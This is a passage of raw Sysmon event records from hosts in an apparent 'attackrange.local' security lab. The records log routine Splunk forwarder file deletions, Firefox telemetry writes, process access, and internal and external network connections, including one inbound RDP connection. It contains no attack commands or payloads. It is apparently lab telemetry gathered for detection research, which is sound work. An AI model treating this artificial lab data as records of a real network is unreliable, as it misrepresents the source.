07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.287{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.287{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.132{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.661{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F08219E8F1435046E337871A166BDC3,SHA256=D31D2A1915E11F2991470CE2987337C445B762A6508079C46F342636E0A91883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:56.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15D4E3DD039F30DEF8546E27C832C89,SHA256=D201DE26E5395F319BAAA089CD6EBD7E3A0A279E286332B14271EA7612E9EA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.408{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B18EDA719B4587CC60AFA953645135CC,SHA256=8124CEB9ADAE4D324E9637477114C0AC9F10854F9F933B6466A3A2F06E1E824E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.408{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7917979FEC5F38BC0DE1C8F17135A470,SHA256=281113C086FE7CC294C5E377DEC3EBF75AE60CAF667D31A468559C827002A2D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C4235FA3DAFFE5070EAA9BBE45E60573,SHA256=A8C2D2F29DD53A61742D7D00447C09A27D7CEC64809371F5F93FC22D35D684A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=426C8A36FA5E820B471505A9FF3E2068,SHA256=B90CEC7B61CA14BE78929EB74573DA068F5B1D3FEE24A01982FBD36C0123652F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=317DE19AB238BF1B6DB06AD8AA37F437,SHA256=5846E56CC2CE69FABAC9C3C5BD36423A4C27310F7A3633FBAC16A64146420A2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=117B0467D473090E8089FB3569BBD157,SHA256=7345401213231365E10595E37FB5A745FD4D49F7567060184A6811F4B642C45D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=153DD101D5D27D9B08A3A16D5DA325E4,SHA256=B41C92D87C39B1A0A8D727FCE5ECE3749CC4D15946CEE86740D0037FCB2CCEB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A5A0976D3F584059A14903EB6D14A237,SHA256=4B5408062A81625EB50CC8D57E59FBAE3F2E12A787D908BD20C286D5FC399D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B0E4F285911A0CC8EBF548DF76576CCD,SHA256=917C0A4F1E6675532FFA8BC7F7D5411F565197B978B5A3CA2012541E0CA83459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9FF99DA8A9C41C4E782EDECB895F895F,SHA256=A33A3D7265F4D9DE1BF6094CAD2EE44B8064B26B2BE2EE7D378B1A50943965FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A31B59192DE3E16D24F268D179F89B0C,SHA256=C9D8E8A59BC3A879626FB0F00D566D929F0DA1EFA6CB9B8DD1D2943E84D9441F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.145{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D31C1C48C35B0B85D7D372B2A548FE9,SHA256=C05CA1763B5431C2D64BE7F8BE97CC2E522CECC6D2A75078099EDDC96E7D2A06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:56.437{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57338-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000808594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:55.850{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-30525-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:57.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=553305B75748855F39A50CF0F006E81A,SHA256=222F05C44E68D3CF6F69BD989D8F06B73AC15C9F03CA67546E141D4EDB4AF379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:57.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E83D5F9DD75C7376A4A58C7ED3E2687,SHA256=5FF8252625F7360CA43D00C7ACC3883B944F6B6A48AF3D174EB934213073B31B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:57.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=214CE1D84718009EA33CC1F183183B6C,SHA256=CECA7CC9823329F5E59FC51EECB61F0B278EF4698F242E6CEBA7E82E93CF72DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:57.676{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450F5AB59D0DA7885375272C52050884,SHA256=8EA12A0BEE054E5FEDFB5FCC97268B54B7BB2F0CA7939F3B49156D1665F3C749,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:57.127{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:58.691{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2799C1F5A9A79EF2C2F6E5AE13C541B,SHA256=B941B0A4E0D57808A3C4D3F5FAE3196C2870C45A425796BCDC215AC9FFF8ADBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:58.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F70299B68E89151B6B67618385D0747,SHA256=50D6658699A8D014C4EBF99AE63366B4C92CDC79944D2955DFFE748FE064DBEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.644{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51105-false10.0.1.12-8089- 354300x80000000000000001051537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.824{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57338-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001051536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.660{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51104-false10.0.1.12-8000- 23542300x80000000000000001051540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:59.705{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B63F30ED26851D1359DB57C64AB76B9,SHA256=FE701C3D49347EE52407D87E00037650C7365B0470E45AF75B0CB06168291915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:59.575{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C00F2D43C65BA1DD5FD319FDE67252B,SHA256=93893C0B6F5BFC37C3937B6C01058DC67C1DA7BA4777D12B667F3D9267735A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:00.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E5B4BE1208EE91EE8ACD13F9876D25,SHA256=D0969A63A5CB1FD5EE14011ED54085052C2E092F08091E1BAFB38F3F4045BA7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:00.723{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96519FEBE5F654897AC524A9B9883CD4,SHA256=1B4CCE5FB415F1F8F126805DAA7B02F53F28FC1A8A7510368E0E16E6D6CAE0B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:01.653{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=546C9D55CF797476D1FB686DD1A0F94F,SHA256=9999CE38490D3CA1190735EDCF1E3B50BDC0B3BACAD3B5B522DBC50B5D5829A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:01.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46002AF12E84DD61486F0163456F0A7,SHA256=FC279000A9FFB2DD3CC8B8EF952545C648BA2FA1BC0D3818C08776CEDE947307,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:59.363{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57339-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:02.684{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=861BD3CE21F2EA1534301E2FEE673AD4,SHA256=DDB0F24030F6F24D318BCFFF3980C7E2B57BF6209889751EC55A2302C0BD763D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:02.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82CC1BB4FE653F9E5AF94D987D74BFB8,SHA256=92B18E462B815EB7AD835DD9AC865FED372516A56B7EB361D83AEF704022CDFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:03.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E136FED7F9BC51B4E16E9C095668D9,SHA256=98604850EBF68D0ACB817ED276E25769A294595434EA392D842A830269B180C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:03.700{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8BAE1B6778DBBE7759761CFFD36F525,SHA256=98730781CFDE6820EB12BFECDA37055C58F3EB96CA26216F15BC4A1B48878ACD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51106-false10.0.1.12-8000- 23542300x8000000000000000808603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:04.715{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C5665B9264D3250C0BCA426DCABF34,SHA256=7F1FEE8FAF18CCEE1E00279A395D0BE3817CBFDF89C5172C836884D49D304FC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:04.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F705556D67AF540906D4A8207ADE49,SHA256=1DF2C04F8AE35669716DB1AA2C18D5557C6A771C4978EB7DC0840021CA93633D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:05.731{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 